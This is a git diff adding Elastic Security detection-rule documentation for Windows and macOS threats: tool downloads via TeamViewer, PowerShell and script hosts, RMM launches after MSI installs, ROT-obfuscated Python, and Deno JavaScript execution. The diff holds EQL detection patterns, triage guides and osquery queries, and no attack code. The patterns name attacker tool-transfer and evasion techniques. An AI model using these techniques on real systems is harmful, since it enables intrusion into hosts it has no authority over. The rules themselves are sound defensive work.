diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc
new file mode 100644
index 0000000000..e9b2e8712c
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc
@@ -0,0 +1,143 @@ +[[prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer]] +=== Remote File Copy via TeamViewer + +Identifies an executable or script file remotely downloaded via a TeamViewer transfer session. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: SentinelOne + +*Version*: 217 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote File Copy via TeamViewer* + + +Attackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files. + +TeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. 
+ + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Contact the user to gather information about who and why was conducting the remote access. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs).
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.
+- Remove and block malicious artifacts identified during triage.
+- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+file where host.os.type == "windows" and event.type == "creation" and process.name : "TeamViewer.exe" and
+ file.extension : ("exe", "dll", "scr", "com", "bat", "cmd", "ps1", "vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta") and
+ not
+ (
+ file.path : (
+ "?:\\Users\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\*.js",
+ "?:\\Users\\*\\AppData\\Local\\Temp\\TeamViewer\\update.exe",
+ "?:\\Users\\*\\AppData\\Local\\Temp\\?\\TeamViewer\\update.exe",
+ "?:\\Users\\*\\AppData\\Local\\TeamViewer\\CustomConfigs\\???????\\TeamViewer_Resource_??.dll",
+ "?:\\Users\\*\\AppData\\Local\\TeamViewer\\CustomConfigs\\???????\\TeamViewer*.exe"
+ ) and process.code_signature.trusted == true
+ )
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Command and Control
+** ID: TA0011
+** Reference URL: https://attack.mitre.org/tactics/TA0011/
+* Technique:
+** Name: Ingress Tool Transfer
+** ID: T1105
+** Reference URL: https://attack.mitre.org/techniques/T1105/
+* Technique:
+** Name: Remote Access Tools
+** ID: T1219
+**
Reference URL: https://attack.mitre.org/techniques/T1219/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc
new file mode 100644
index 0000000000..7c79c0104b
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc
@@ -0,0 +1,166 @@ +[[prebuilt-rule-8-19-18-remote-file-download-via-powershell]] +=== Remote File Download via PowerShell + +Identifies powershell.exe being used to download an executable file from an untrusted remote destination. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.network-* +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 115 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote File Download via PowerShell* + + +Attackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files. + +PowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html[Investigate Markdown Plugin] introduced in Elastic Stack version 8.8.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Investigate other alerts associated with the user/host during the past 48 hours. + - !{investigate{"label":"Alerts associated with the user in the last 48h","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"user.id","queryType":"phrase","value":"{{user.id}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}} + - !{investigate{"label":"Alerts associated with the host in the last 48h","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"host.name","queryType":"phrase","value":"{{host.name}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}} +- Check the reputation of the domain or IP address used to host the downloaded file. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. 
+ - !{investigate{"label":"Investigate the Subject Process Network Events","providers":[[{"excluded":false,"field":"process.entity_id","queryType":"phrase","value":"{{process.entity_id}}","valueType":"string"},{"excluded":false,"field":"event.category","queryType":"phrase","value":"network","valueType":"string"}]]}} + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=30s +[network where host.os.type == "windows" and + process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and + network.protocol == "dns" and + not dns.question.name : ( + "*.microsoft.com", "*.azureedge.net", "*.powershellgallery.com", "*.windowsupdate.com", + "metadata.google.internal", "dist.nuget.org", "artifacts.elastic.co", "*.digicert.com", + "*.chocolatey.org", "outlook.office365.com", "cdn.oneget.org", "ci.dot.net", + "packages.icinga.com", "login.microsoftonline.com", "*.gov", "*.azure.com", "*.python.org", + "dl.google.com", "sensor.cloud.tenable.com", "*.azurefd.net", "*.office.net", "*.anac*", + "aka.ms", "dot.net", "*.visualstudio.com", "*.local") and + not user.id == "S-1-5-18" and + /* Filter out NetBIOS/LLMNR-style names (e.g. host, localhost, etc.) */ + dns.question.name regex """.*\.[a-zA-Z]{2,5}"""] +[file where host.os.type == "windows" and event.type == "creation" and + process.name : "powershell.exe" and + (file.extension : ("exe", "dll", "ps1", "bat", "cmd", "vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta", "cpl", "scr", "pif", "com") or file.Ext.header_bytes : "4d5a*") and + not file.name : "__PSScriptPolicy*.ps1" and + not file.path : ( + "?:\\Users\\*\\AppData\\Local\\Temp\\????????.dll", + "?:\\Users\\*\\AppData\\Local\\Temp\\*\\????????.dll", + "?:\\Windows\\TEMP\\ansible-tmp-*\\AnsiballZ*.ps1" + ) and + not user.id == "S-1-5-18"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** 
ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc new file mode 100644 index 0000000000..25c379a1bb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc 
@@ -0,0 +1,146 @@ +[[prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter]] +=== Remote File Download via Script Interpreter + +Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.network-* +* logs-endpoint.events.file-* +* logs-windows.sysmon_operational-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon + +*Version*: 214 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote File Download via Script Interpreter* + + +The Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation. + +Attackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals. + +This rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. 
+ + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze both the script and the executable involved using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id + [network where host.os.type == "windows" and process.name : ("wscript.exe", "cscript.exe") and network.protocol != "dns" and + network.direction : ("outgoing", "egress") and network.type == "ipv4" and destination.ip != "127.0.0.1" + ] + [file where host.os.type == "windows" and event.type == "creation" and + file.extension : ("exe", "dll", "bat", "cmd", "ps1", "vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta", "scr", "pif", "com", "cpl")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting 
Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc new file mode 100644 index 0000000000..a761ddacc4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc 
@@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install]] +=== Remote Management Access Launch After MSI Install + +Detects an MSI installer execution followed by the execution of commonly abused Remote Management Software like ScreenConnect. This behavior may indicate abuse where an attacker triggers an MSI install then connects via a guest link with a known session key. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1219/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Windows Security Event Logs +* Data Source: Elastic Endgame + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote Management Access Launch After MSI Install* + + +This rule fires when the same host runs msiexec with an install argument (/i) and within one minute starts a pre-configured RMM software. + + +*Possible investigation steps* + + +- Confirm the sequence on the host: first event should be msiexec.exe with process.args containing "/i"; second should be a remote management software. +- Review the source of the MSI file using file events. +- Check whether use of RMM software is approved for this host. 
+- Check network events to validate which remote host the RMM software connects to. +- Correlate with other alerts for the same host (initial access, persistence, C2). + + +*False positive analysis* + + +- Legitimate IT/MSP deployment of RMM for support. + + +*Response and remediation* + + +- If unauthorized RMM use or abuse is confirmed: isolate the host, terminate the ScreenConnect client, remove or block the installation, and investigate how the MSI was delivered and who operates the relay. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1m + [process where host.os.type == "windows" and event.type == "start" and process.name : "msiexec.exe" and process.args : ("/i*", "-i*")] + [process where host.os.type == "windows" and event.type == "start" and + ( + (process.name : "ScreenConnect.ClientService.exe" and process.command_line : "*?e=Access&y=Guest&h*&k=*") or + (process.name : "Syncro.Installer.exe" and process.args : "--config-json" and process.args : "--key") or + process.name : ("tvnserver.exe", "winvnc.exe") + ) + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Sub-technique: +** Name: Remote Desktop Software +** ID: T1219.002 +** Reference URL: https://attack.mitre.org/techniques/T1219/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc new file mode 100644 index 0000000000..2677e1ee2a --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc 
@@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-18-rot-encoded-python-script-execution]] +=== ROT Encoded Python Script Execution + +Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/dprk-code-of-conduct +* https://www.reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating ROT Encoded Python Script Execution* + + +ROT encoding, a simple letter substitution cipher, is often used to obfuscate Python scripts, making them harder to analyze. Adversaries exploit this by embedding ROT-encoded scripts within legitimate packages to evade detection. The detection rule identifies such activities by monitoring Python script executions and the presence of ROT-encoded compiled files, flagging potential misuse on Windows and macOS systems. 
+ + +*Possible investigation steps* + + +- Review the process entity ID to identify the specific Python process that triggered the alert and gather details such as the process start time and command line arguments. +- Examine the file path and name of the ROT-encoded compiled file (e.g., "rot_??.cpython-*.pyc") to determine its origin and whether it is part of a legitimate package or potentially malicious. +- Check the parent process of the Python script to understand how it was initiated and whether it was executed by a legitimate application or user. +- Investigate the user account associated with the process to determine if the activity aligns with their typical behavior or if it appears suspicious. +- Analyze any network connections or file modifications made by the Python process to identify potential data exfiltration or further malicious activity. +- Correlate this alert with other security events or logs from the same host to identify patterns or additional indicators of compromise. + + +*False positive analysis* + + +- Legitimate development activities may trigger the rule if developers use ROT encoding for testing or educational purposes. To manage this, create exceptions for known development environments or specific user accounts involved in such activities. +- Automated scripts or tools that use ROT encoding for legitimate data processing tasks can be flagged. Identify these scripts and whitelist their execution paths or associated process names to prevent false alerts. +- Some security tools or software may use ROT encoding as part of their normal operations. Review and document these tools, then configure the detection system to exclude their known file paths or process identifiers. +- Regularly scheduled tasks or cron jobs that involve ROT-encoded files for non-malicious purposes can cause false positives. Exclude these tasks by specifying their unique identifiers or execution schedules in the detection rule settings. 
+ + +*Response and remediation* + + +- Isolate the affected system from the network to prevent further spread of potentially malicious activity. +- Terminate any running Python processes that are identified as executing ROT-encoded scripts to halt the execution of obfuscated code. +- Conduct a thorough review of the affected system to identify and remove any ROT-encoded Python files, specifically targeting files matching the pattern "rot_??.cpython-*.pyc*". +- Restore any affected systems from a known good backup to ensure the removal of any persistent threats. +- Implement application whitelisting to prevent unauthorized Python scripts from executing, focusing on blocking scripts with ROT encoding patterns. +- Escalate the incident to the security operations team for further analysis and to determine if additional systems are affected. +- Update detection mechanisms to monitor for similar ROT-encoded script activities, enhancing the ability to detect and respond to future threats. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=1m + [process where host.os.type in ("windows", "macos") and event.type == "start" and process.name : "python*" and + not ( + process.args : ("*gcloud.py", "*conda-script.py", "*compileall.py", "*.lmstudio*") or + process.parent.args : ("*gcloud.py", "*conda-script.py", "*compileall.py", "*.lmstudio*") + )] + [file where host.os.type in ("windows", "macos") and + event.action != "deletion" and process.name : "python*" and file.name : "rot_??.cpython-*.pyc*"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Deobfuscate/Decode Files or Information +** ID: T1140 +** Reference URL: https://attack.mitre.org/techniques/T1140/ +* Technique: +** Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: 
https://attack.mitre.org/techniques/T1027/ +* Sub-technique: +** Name: Encrypted/Encoded File +** ID: T1027.013 +** Reference URL: https://attack.mitre.org/techniques/T1027/013/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc new file mode 100644 index 0000000000..ad5a9ed389 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc 
@@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno]] +=== Suspicious JavaScript Execution via Deno + +Detects execution of JavaScript via Deno with suspicious command-line patterns (base64, eval, http, or import in a javascript context). Adversaries may abuse Deno to run malicious JavaScript for execution or staging. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat +* https://deno.com/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Windows Security Event Logs + +*Version*: 1 